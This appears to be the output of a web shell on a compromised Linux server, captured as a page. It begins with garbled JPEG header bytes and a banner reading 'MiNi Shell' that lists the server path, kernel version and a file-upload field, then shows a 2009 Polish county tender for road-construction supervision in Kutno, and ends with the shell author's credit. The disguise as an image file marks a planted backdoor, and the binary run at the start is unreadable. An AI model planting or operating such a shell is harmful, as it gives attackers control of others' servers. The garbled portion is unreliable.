JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090209/35237-N-2009.html

<p class="kh_header"><b>Kutno: PEŁNIENIE NADZORU INWESTORSKIEGO NAD REALIZACJĄ ROBÓT BUDOWLANYCH OBEJMUJĄCYCH PRZEBUDOWĘ DROGI POWIATOWEJ W RAMACH ZADANIA:
 Przebudowa drogi powiatowej nr 2149E Krośniewice - Dąbrowice od km 0+000 do km 4+000 na terenie gmin Krośniewice i Dąbrowice</b><br>
<b>Numer ogłoszenia: 35237 - 2009; data zamieszczenia: 09.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Kościuszki 16, 99-300 Kutno, woj. łódzkie, tel. 024 3554780, faks 024 3554784.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kutno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE NADZORU INWESTORSKIEGO NAD REALIZACJĄ ROBÓT BUDOWLANYCH OBEJMUJĄCYCH PRZEBUDOWĘ DROGI POWIATOWEJ W RAMACH ZADANIA:
 Przebudowa drogi powiatowej nr 2149E Krośniewice - Dąbrowice od km 0+000 do km 4+000 na terenie gmin Krośniewice i Dąbrowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania jest usługa polegająca na pełnieniu nadzoru inwestorskiego nad realizacją robót budowlanych obejmujących przebudowę drogi powiatowej nr 2149E Krośniewice - Dąbrowice na odcinku od km 0+000 do km 4+000.
  Zakres robót budwlanych obejmuje:
a) roboty przygotowawcze,
b) poszerzenie jezdni: od km 0+578,2 do km 0+666,4 do 6,0 m, od km 0+666,40 do km 4+000 z 4.0 m do 5,5 m,
c) wykonanie nowej nawierzchnia jezdni od km 0+008,2 do km 4+000,
d) modernizację istniejących chodników oraz budowę nowego chodnika,
e) wykonanie nawierzchni miejsc postojowych w ulicy Kolejowej w Krośniewicach z kostki brukowej betonowej grubości 8 cm na podsypce cementowo-piaskowej,
f) odwodnienie korpusu drogowego - przebudowa istniejącego przepustu na rowach melioracyjnych,
g) wykonanie zjazdów do posesji w ulicy Kolejowej z kostki brukowej betonowej grubości 8 cm,
h) wykonanie zjazdów na drogi publiczne z mieszanek mineralno-bitumicznych asfaltowych,
i) wykonanie zjazdów żwirowych na szlaku,
j) wykonanie poboczy żwirowych,
k) oczyszczenie rowów z wyprofilowaniem dna i skarp z namułu,
l) montaż oznakowania pionowego,
m) wykonanie oznakowania poziomego,
n) przebudowę istniejącej kanalizacji deszczowej kd 200 mm na kanalizację kd 400 mm,
o) inne prace związane z wykonaniem zadania, w tym: regulacja pionowa studzienek dla zaworów wodociągowych, regulacja pionowa studzienek dla studzienek telefonicznych, założenie rur dwudzielnych AROTa 120PS na linie energetyczne pod nawierzchnią miejsc postojowych, przebudowa istniejących hydrantów w chodniku, sporządzenie geodezyjnej inwentaryzacji powykonawczej.
Szczegółowy opis i zakres robót budowlanych będących przedmiotem nadzoru inwestorskiego zawierają następujące załączniki do SIWZ:
a) Załącznik nr 7 - Specyfikacje techniczne wykonania i odbioru robót budowlanych,
b) Załącznik nr 8 - Dokumentacja techniczna (projekt techniczny) - załączona dokumentacja dotyczy odcinka drogi od km 0+000 do km 8+088, roboty budowlane objęte niniejszym postępowaniem dotyczą odcinka od km 0+000 do km 4+000 i w takim zakresie załączona dokumentacja podlega wykorzystaniu,
c) Załącznik nr 9A - Przedmiar robót - branża drogowa,
d) Załącznik nr 9B - Przedmiar robót - branża sanitarna.
2. Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie realizacji robót budowlanych będących przedmiotem nadzoru inwestorskiego i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.
3. W załączniku Nr 5 do SIWZ przedstawiono przewidywany przez Zamawiającego Harmonogram rzeczowy wykonania robót budowlanych będących przedmiotem nadzoru inwestorskiego. Wykonawca robót budowlanych przedstawi Zamawiającemu do zatwierdzenia proponowany przez siebie Harmonogram rzeczowo - finansowy w terminie 7 dni od daty zawarcia umowy w sprawie zamówienia publicznego dotyczącego robót budowlanych, który następnie przekazany zostanie Wykonawcy nadzoru inwestorskiego.
4. Zakres obowiązków i czynności Wykonawcy nadzoru inwestorskiego:
1) pełnienie nadzoru budowlanego zgodnie z obowiązującym przepisami prawa w szczególności ustawą z dnia 7 lipca 1994 roku Prawo budowlane, pozwoleniem na budowę, dokumentacją techniczną, zatwierdzonym kosztem inwestycji oraz Specyfikacjami technicznymi wykonania i odbioru robót budowlanych,
2) reprezentowanie interesów Zamawiającego wobec Wykonawcy robót budowlanych objętych nadzorem inwestorskim,
3) kontrola prawidłowości lokalizacji robót,
4) współpraca z nadzorem autorskim,
5) sprawdzenie jakości wykonanych robót budowlanych i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczalnych do stosowania w budownictwie,
6) sprawdzanie i odbioru robót budowlanych ulegających zakryciu lub zanikających,
7) monitoring postępu robót w stosunku do harmonogramu, oraz przekazywanie informacji o postępach robót na żądanie Zamawiającego,
8) sprawdzanie stanu bezpieczeństwa na budowie w szczególności upewnienie się przed rozpoczęciem robót, że spełnione zostały wymagania dotyczące bezpieczeństwa ruchu, obejmujące także poruszanie się po terenie budowy,
9) kontrola zabezpieczenia przeciwpożarowego na terenie budowy oraz utrzymania ogólnego porządku na budowie,
10) kontrola przestrzegania przedsięwzięć dla ochrony środowiska w czasie budowy i po wykonaniu obiektów stałych,
11) kontrola receptur, atestów, certyfikatów producenta, dostarczonych przez Wykonawcę robót budowlanych oraz prowadzenie zapisów z kontroli, zmian, badań i spraw spornych,
12) wydawania poleceń usuwania efektów robót wykonanych niewłaściwie lub poniżej standardu,
13) sprawdzenie i potwierdzanie zakresu wykonanych robót oraz obmiarów wykonanych robót służących do sporządzania płatności, 
14) obecność przedstawiciela nadzoru inwestorskiego na terenie budowy w okresie trwania  umowy o roboty budowlane - w zależności od potrzeb, ale w sposób zapewniający należyte pełnienie nadzoru,
15) uczestniczenie w pobieraniu próbek oraz akceptacja pozytywnych wyników wykonywanych badań,
16) uczestniczenie w odbiorach częściowych i ostatecznym robót budowlanych objętych nadzorem inwestorskim..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w wysokości 1.500,00 PLN (jeden tysiąc pięćset złotych) przed upływem terminu składania ofert.
1. W zależności od woli wykonawcy wadium może być wnoszone w formach:
- pieniądza,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 9.11.2000 r. o utworzeniu PARP (Dz.U. Nr 109 poz. 1158 wraz z późniejszymi zmianami).
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:
* Wykonawca, którego ofertę wybrano odmówił podpisania umowy na warunkach określonych w ofercie, lub
* zawarcie umowy z Wykonawcą, którego ofertę wybrano, stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, lub
* Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy z dnia 29.01.2004 roku Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 roku Nr 223, poz. 1655), nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, i nie udowodnił, że wynika to z przyczyn nie leżących po jego stronie.
2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr 91 2030 0045 1110 0000 0105 1790 w BGŻ O/Kutno przed upływem terminu składania ofert.
Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu (wpłaty) załączona do oferty.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
3. Wadium wniesione w postaci poręczeń i gwarancji bankowych oraz gwarancji ubezpieczeniowych należy załączyć do oferty.
4. Wadium zostanie zwrócone, jeżeli:
1) upłynął termin związania ofertą,
2) zawarto umowę w sprawie zamówienia publicznego,
3) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
5. Z zastrzeżeniem pkt. 8 Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy:
1) który wycofał ofertę przed upływem terminu składania ofert,
2) który został wykluczony z postępowania,
3) którego oferta została odrzucona.
6. Złożenie przez wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez niego prawa do wniesienia protestu.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
* odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
* zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9. Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie Wykonawcy przez Zamawiającego. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.
10. Wadium wybranego Wykonawcy zostanie zwrócone niezwłocznie po zawarciu przez niego umowy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy:
1 Spełniający postanowienia art. 22 ust.1 ustawy Prawo zamówień publicznych tj.:
1.1. posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2. posiadający niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. wykażą, iż posiadają personel odpowiedzialny za realizację zamówienia, posiadający wymagane obowiązującymi przepisami uprawnienia, minimum:
a) inspektor nadzoru robót drogowych - Koordynator - osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub konstrukcyjno - budowlanymi bez ograniczeń, która przed dniem wszczęcia postępowania o udzielenie zamówienia, pełniła funkcję inspektora nadzoru lub kierownika budowy/robót w realizacji minimum 1 roboty budowlanej w zakresie przebudowy drogi co najmniej klasy Z,
b) inspektor nadzoru robót sanitarnych - osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych, która przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, pełniła funkcję inspektora nadzoru lub kierownika robót w realizacji minimum 1 roboty budowlanej w zakresie przebudowy sieci kanalizacyjnej.
Zamawiający dopuszcza aby Wykonawca w ofercie do pełnienia funkcji inspektora nadzoru robót drogowych - Koordynatora i inspektora nadzoru robót sanitarnych wskazał tą samą osobę pod warunkiem, że osoba ta spełniać będzie wszystkie wymagania określone powyżej dla obydwu funkcji.
1.3. znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
1.4. nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust 1 i 2 ustawy.
2. Którzy spełnią warunki Specyfikacji Istotnych Warunków Zamówienia oraz złożą dokumenty wymienione w pkt. 6 SIWZ.

Wykonawcy ubiegający się wspólnie o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunki z pkt 1.2 a) i b) oraz pkt 1.3 natomiast każdy z nich musi spełnić warunek z pkt 1.1 oraz pkt 1.4..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy mają złożyć następujące oświadczenia i dokumenty:
a) oświadczenie zgodne z art. 22 ust. 1 ustawy Prawo zamówień publicznych, druk Załącznik nr 2 do SIWZ,
b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c) wykaz personelu do realizacji zamówienia - druk Załącznik nr 3 do SIWZ - wraz z załączeniem uprawnień i aktualnych zaświadczeń o przynależności do Okręgowej Izby Inżynierów Budownictwa,
d) informacja o doświadczeniu osób wskazanych w Załączniku Nr 3 - druk Załącznik nr 4 do SIWZ, wypełniona odrębnie dla inspektora nadzoru robót drogowych - Koordynatora i inspektora nadzoru robót sanitarnych,
e) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w lit. c) Wykonawca wskazał osoby, którymi będzie dysponował,
ponadto:
f) wypełniony formularz oferty - druk Załącznik nr 1 do SIWZ,
g) dokument potwierdzający wniesienie wadium,
h) pełnomocnictwo w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia.

Z postępowania wyklucza się Wykonawców na podst. z art. 24 ust. 1 pkt. 1-10 ustawy i ust. 2 pkt 1 - 4, ofertę Wykonawcy wykluczonego uznaje się za odrzuconą na podstawie art. 89 ust. 1 pkt 5 ustawy.

Wykonawcy ubiegający się wspólnie o zamówienie składają oświadczenia i dokumenty z pkt. a), b) każdy z osobna, pozostałe oświadczenia i dokumenty łącznie (grupowo).

2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
2.1. zamiast dokumentu o którym mowa w pkt 1 lit. b) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2.2. Dokument o którym mowa w pkt. 2.1. powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczeniu do udziału w postępowaniu. 
2.3. Jeżeli w kraju pochodzenia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o którym mowa w pkt 2.1 zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt 2.2 stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.kutno.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Kutnie, Referat Inwestycji i Programów Pomocowych, ul. Staszica 27, 99-300 Kutno.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2009 godzina 11:00, miejsce: Kancelaria Starostwa Powiatowego w Kutnie, ul. Kościuszki 16, 99-300 Kutno.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Nadzór inwestorski należy realizować od dnia podpisania umowy aż do zakończenia robót budowlanych związanych z realizacją niniejszego zamówienia, przy czym za zakończenie prac pełnienia nadzoru inwestorskiego uważa się zorganizowanie i przeprowadzenie odbioru ostatecznego i ostatecznego finansowego rozliczenia robót budowlanych objętych nadzorem inwestorskim.

Creat By MiNi SheLL
Email: jattceo@gmail.com